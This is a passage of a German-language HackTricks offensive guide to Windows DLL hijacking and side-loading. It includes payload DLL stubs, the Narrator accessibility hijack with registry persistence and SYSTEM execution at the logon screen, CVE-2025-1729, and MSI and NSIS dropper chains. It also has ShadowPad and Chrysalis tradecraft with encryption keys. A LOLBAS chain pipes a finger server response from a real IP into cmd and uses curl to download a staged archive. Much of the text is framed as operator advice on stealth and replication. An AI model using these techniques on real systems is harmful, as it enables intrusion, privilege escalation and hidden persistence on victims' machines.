#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Fallstudie: Narrator OneCore TTS Localization DLL Hijack (Barrierefreiheit/ATs)

Windows Narrator.exe prüft beim Start weiterhin eine vorhersehbare, sprachspezifische Lokalisierungs-DLL, die für arbitrary code execution und persistence gehijackt werden kann.

Key facts
- Probe path (current builds): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Legacy path (older builds): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- If a writable attacker-controlled DLL exists at the OneCore path, it is loaded and `DllMain(DLL_PROCESS_ATTACH)` executes. No exports are required.

Discovery with Procmon
- Filter: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Start Narrator and observe the attempted load of the above path.

Minimale DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• Ein naiver hijack wird die UI sprechen/hervorheben. Um still zu bleiben, beim Anfügen Narrator-Threads auflisten, den Hauptthread öffnen (OpenThread(THREAD_SUSPEND_RESUME)) und mit SuspendThread anhalten; in Ihrem eigenen Thread fortfahren. Siehe PoC für vollständigen Code.

Trigger und Persistenz via Accessibility-Konfiguration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Mit den obigen Einstellungen lädt das Starten von Narrator die platzierte DLL. Auf dem sicheren Desktop (Anmeldebildschirm) drücken Sie CTRL+WIN+ENTER, um Narrator zu starten; Ihre DLL wird als SYSTEM auf dem sicheren Desktop ausgeführt.

RDP-triggered SYSTEM-Ausführung (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP to the host, at the logon screen press CTRL+WIN+ENTER to launch Narrator; your DLL executes as SYSTEM on the secure desktop.
• Die Ausführung stoppt, wenn die RDP-Sitzung geschlossen wird — inject/migrate zeitnah.

Bring Your Own Accessibility (BYOA)

• Sie können einen integrierten Accessibility Tool (AT)-Registry-Eintrag (z. B. CursorIndicator) klonen, ihn so bearbeiten, dass er auf eine beliebige Binary/DLL zeigt, ihn importieren und dann configuration auf diesen AT-Namen setzen. Dadurch wird beliebige Ausführung im Accessibility-Framework ermöglicht.

Hinweise

• Schreiben unter %windir%\System32 und das Ändern von HKLM-Werten erfordert Admin-Rechte.
• Die gesamte Payload-Logik kann in DLL_PROCESS_ATTACH leben; Exports sind nicht erforderlich.

Fallstudie: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

Dieser Fall demonstriert Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), erfasst als CVE-2025-1729.

Details zur Schwachstelle

• Komponente: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Directory Permissions: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
• DLL Search Behavior: Attempts to load hostfxr.dll from its working directory first and logs “NAME NOT FOUND” if missing, indicating local directory search precedence.

Exploit-Implementierung

Ein Angreifer kann eine bösartige hostfxr.dll-Stub im selben Verzeichnis ablegen und die fehlende DLL ausnutzen, um Codeausführung im Kontext des Benutzers zu erreichen:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Angriffsablauf

1. Als Standardbenutzer die Datei hostfxr.dll nach C:\ProgramData\Lenovo\TPQM\Assistant\ ablegen.
2. Auf das Ausführen der geplanten Aufgabe um 09:30 AM im Kontext des aktuellen Benutzers warten.
3. Wenn ein Administrator angemeldet ist, wenn die Aufgabe ausgeführt wird, läuft die bösartige DLL in der Administrator-Session mit medium integrity.
4. Standardmäßige UAC bypass techniques verketten, um von medium integrity zu SYSTEM-Privilegien zu gelangen.

Fallstudie: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Bedrohungsakteure kombinieren häufig MSI-basierte dropper mit DLL side-loading, um payloads unter einem vertrauenswürdigen, signierten Prozess auszuführen.

Chain overview

• Der Benutzer lädt eine MSI herunter. Eine CustomAction läuft still während der GUI-Installation (z. B. LaunchApplication oder eine VBScript-Aktion) und rekonstruiert die nächste Stufe aus eingebetteten Ressourcen.
• Der dropper schreibt eine legitime, signierte EXE und eine bösartige DLL in dasselbe Verzeichnis (Beispielpaar: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• Wenn die signierte EXE gestartet wird, lädt die Windows DLL search order zuerst wsc.dll aus dem Arbeitsverzeichnis und führt damit Code des Angreifers unter einem signierten Parent aus (ATT&CK T1574.001).

MSI analysis (what to look for)

• CustomAction table:
• Nach Einträgen suchen, die Executables oder VBScript ausführen. Beispiel für ein verdächtiges Muster: LaunchApplication, das eine eingebettete Datei im Hintergrund ausführt.
• In Orca (Microsoft Orca.exe) die Tabellen CustomAction, InstallExecuteSequence und Binary inspizieren.
• Eingebettete/aufgeteilte payloads in der MSI CAB:
• Administrative extract: msiexec /a package.msi /qb TARGETDIR=C:\out
• Or use lessmsi: lessmsi x package.msi C:\out
• Nach mehreren kleinen Fragmenten suchen, die von einer VBScript CustomAction zusammengefügt und entschlüsselt werden. Typischer Ablauf:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Praktisches sideloading mit wsc_proxy.exe

• Legen Sie diese beiden Dateien in denselben Ordner:
• wsc_proxy.exe: legitim signierter Host (Avast). Der Prozess versucht, wsc.dll per Name aus seinem Verzeichnis zu laden.
• wsc.dll: Angreifer-DLL. Wenn keine spezifischen exports erforderlich sind, kann DllMain ausreichen; andernfalls bauen Sie eine proxy DLL und leiten die benötigten exports an die genuine library weiter, während das payload in DllMain ausgeführt wird.
• Erstellen Sie ein minimales DLL payload:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Für Exportanforderungen verwenden Sie ein Proxy-Framework (z. B. DLLirant/Spartacus), um eine Forwarding-DLL zu erzeugen, die außerdem Ihr Payload ausführt.

• Diese Technik beruht auf der DLL-Namensauflösung durch das Host-Binary. Wenn der Host absolute Pfade oder sichere Lade-Flags verwendet (z. B. LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), kann der Hijack fehlschlagen.

• KnownDLLs, SxS und forwarded exports können die Priorität beeinflussen und müssen bei der Auswahl des Host-Binaries und des Export-Sets berücksichtigt werden.

Signed triads + encrypted payloads (ShadowPad case study)

Check Point beschrieb, wie Ink Dragon ShadowPad mit einer Triade aus drei Dateien deployt, um sich in legitimer Software zu tarnen und gleichzeitig den Kern-Payload auf der Festplatte verschlüsselt zu halten:

1. Signierte Host-EXE – Anbieter wie AMD, Realtek oder NVIDIA werden missbraucht (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Die Angreifer benennen die ausführbare Datei um, damit sie wie ein Windows-Binary aussieht (z. B. conhost.exe), die Authenticode-Signatur bleibt jedoch gültig.
2. Bösartige Loader-DLL – wird neben der EXE mit einem erwarteten Namen abgelegt (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). Die DLL ist üblicherweise ein MFC-Binary, das mit dem ScatterBrain-Framework obfuskiert ist; ihre einzige Aufgabe ist es, den verschlüsselten Blob zu finden, ihn zu entschlüsseln und ShadowPad reflectively zu mapen.
3. Verschlüsselter Payload-Blob – wird oft als <name>.tmp im selben Verzeichnis gespeichert. Nach dem Memory-Mapping des entschlüsselten Payloads löscht der Loader die TMP-Datei, um forensische Spuren zu vernichten.

Tradecraft-Hinweise:

• Durch das Umbenennen der signierten EXE (während der ursprüngliche OriginalFileName im PE-Header erhalten bleibt) kann sie sich als Windows-Binary tarnen und gleichzeitig die Vendor-Signatur behalten. Replizieren Sie daher Ink Dragon’s Vorgehen, conhost.exe-ähnliche Binaries abzulegen, die tatsächlich AMD-/NVIDIA-Utilities sind.
• Da die ausführbare Datei als vertrauenswürdig gilt, müssen die meisten Allowlisting-Kontrollen nur Ihre bösartige DLL neben ihr finden. Konzentrieren Sie sich auf die Anpassung der Loader-DLL; das signierte Parent kann typischerweise unverändert ausgeführt werden.
• Der Decryptor von ShadowPad erwartet, dass der TMP-Blob neben dem Loader liegt und beschreibbar ist, damit er die Datei nach dem Mapping nullen kann. Halten Sie das Verzeichnis beschreibbar, bis der Payload geladen ist; sobald er im Speicher liegt, kann die TMP-Datei aus OPSEC-Gründen sicher gelöscht werden.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Operatoren koppeln DLL sideloading mit LOLBAS, sodass das einzige kundenspezifische Artefakt auf der Festplatte die bösartige DLL neben der vertrauenswürdigen EXE ist:

• Remote command loader (Finger): Verstecktes PowerShell startet cmd.exe /c, zieht Befehle von einem Finger-Server und leitet sie an cmd weiter:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host zieht TCP/79-Text; | cmd führt die Server-Antwort aus, sodass Operatoren den Second-Stage-Server serverseitig rotieren lassen können.

• Built-in download/extract: Laden Sie ein Archiv mit einer harmlosen Erweiterung herunter, entpacken Sie es und legen Sie das Sideload-Ziel plus DLL unter einem zufälligen %LocalAppData%-Ordner ab:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L unterdrückt die Fortschrittsanzeige und folgt Redirects; tar -xf verwendet das in Windows eingebaute tar.

• WMI/CIM-Start: Starten Sie die EXE via WMI, damit die Telemetrie einen CIM-erstellten Prozess anzeigt, während sie die colocated DLL lädt:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Funktioniert mit Binaries, die lokale DLLs bevorzugen (z. B. intelbq.exe, nearby_share.exe); der Payload (z. B. Remcos) läuft unter dem vertrauten Namen.

• Hunting: Alarmieren Sie bei forfiles, wenn /p, /m und /c zusammen auftreten; das ist außerhalb von Admin-Skripten unüblich.

Case Study: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Bei einer jüngsten Lotus Blossom-Intrusion wurde eine vertrauenswürdige Update-Kette missbraucht, um einen mit NSIS verpackten Dropper zu liefern, der einen DLL-Sideload und vollständig im Speicher ablaufende Payloads bereitstellte.

Tradecraft-Ablauf

• update.exe (NSIS) erstellt %AppData%\Bluetooth, markiert es als HIDDEN, legt eine umbenannte Bitdefender Submission Wizard BluetoothService.exe, eine bösartige log.dll und einen verschlüsselten Blob BluetoothService ab und startet dann die EXE.
• Die Host-EXE importiert log.dll und ruft LogInit/LogWrite auf. LogInit mappt den Blob per mmap in den Speicher; LogWrite entschlüsselt ihn mit einem benutzerdefinierten LCG-basierten Stream (Konstanten 0x19660D / 0x3C6EF35F, Key-Material abgeleitet aus einem vorherigen Hash), überschreibt den Buffer mit Klartext-Shellcode, gibt temporäre Ressourcen frei und springt dann zu diesem.
• Um eine IAT zu vermeiden, löst der Loader APIs auf, indem er Export-Namen mit FNV-1a basis 0x811C9DC5 + prime 0x1000193 hasht, dann eine Murmur-ähnliche Avalanche (0x85EBCA6B) anwendet und gegen gesalzene Ziel-Hashes vergleicht.

Main shellcode (Chrysalis)

• Entschlüsselt ein PE-ähnliches Hauptmodul, indem add/XOR/sub mit dem Schlüssel gQ2JR&9; über fünf Durchläufe wiederholt werden, lädt dann dynamisch Kernel32.dll → GetProcAddress, um die Import-Auflösung abzuschließen.
• Rekonstruiert DLL-Namensstrings zur Laufzeit mittels pro-Zeichen Bit-Rotate/XOR-Transformationen und lädt dann oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Verwendet einen zweiten Resolver, der die PEB → InMemoryOrderModuleList durchläuft, jede Export-Tabelle in 4-Byte-Blöcken mit Murmur-ähnlicher Mischung parst und nur auf GetProcAddress zurückfällt, wenn der Hash nicht gefunden wird.

Embedded configuration & C2

• Die Konfiguration liegt in der abgelegten Datei BluetoothService bei offset 0x30808 (Größe 0x980) und wird mit RC4 und dem Schlüssel qwhvb^435h&*7 entschlüsselt, wodurch die C2-URL und der User-Agent sichtbar werden.
• Beacons bauen ein punkte-getrenntes Host-Profil, hängen das Tag 4Q davor und verschlüsseln es dann mit RC4 mit dem Schlüssel vAuig34%^325hGV, bevor HttpSendRequestA über HTTPS aufgerufen wird. Antworten werden mit RC4 entschlüsselt und per Tag-Switch verteilt (4T shell, 4V process exec, 4W/4X file write, 4Y read/exfil, 4\\ uninstall, 4 drive/file enum + chunked transfer cases).
• Der Ausführungsmodus wird durch CLI-Argumente gesteuert: keine Argumente = Installation von Persistence (Service/Run-Key) pointing to -i; -i startet sich selbst mit -k neu; -k überspringt die Installation und führt den Payload aus.

Beobachteter alternativer Loader

• Dieselbe Intrusion legte Tiny C Compiler ab und führte svchost.exe -nostdlib -run conf.c aus C:\ProgramData\USOShared\ aus, mit libtcc.dll daneben. Der vom Angreifer bereitgestellte C-Quellcode bettete Shellcode ein, wurde kompiliert und im Speicher ausgeführt, ohne die Festplatte mit einem PE zu berühren. Replizieren mit:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Diese TCC-basierte Compile-and-Run-Phase importierte Wininet.dll zur Laufzeit und lud einen second-stage shellcode von einer fest kodierten URL herunter, wodurch ein flexibler Loader entstand, der sich als Compilerlauf tarnt.

Referenzen

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.